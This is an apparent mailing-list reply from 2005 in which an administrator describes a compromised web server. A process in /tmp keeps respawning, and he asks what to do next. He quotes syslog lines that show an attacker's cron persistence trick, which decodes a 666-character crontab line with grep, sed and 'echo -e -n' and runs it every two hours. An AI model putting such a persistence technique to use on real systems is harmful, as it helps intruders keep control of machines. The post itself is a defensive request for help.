Re: a compromised machine
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00
/tmp/dlciiqlno x
that means, that the process was started at 17:31 today. So i checked
logs (all virtual servers) and there was nothing under 17:31 except for
193.77.107.1 - - [24/Jul/2005:17:31:39 +0200] "GET / HTTP/1.0" 200 3444
"-" "-"
I didn't make much sense to me, so i checked also syslog and it said
Jul 24 17:31:01 soncek /USR/SBIN/CRON[6050]: (www-data) CMD (/bin/echo
`crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|s$
Jul 24 17:31:01 soncek crontab[6054]: (www-data) LIST (www-data)
I killed the process and webserver and at 19:31 the process again
started with the same lines in syslog.
What now?
Thanks
Reply to: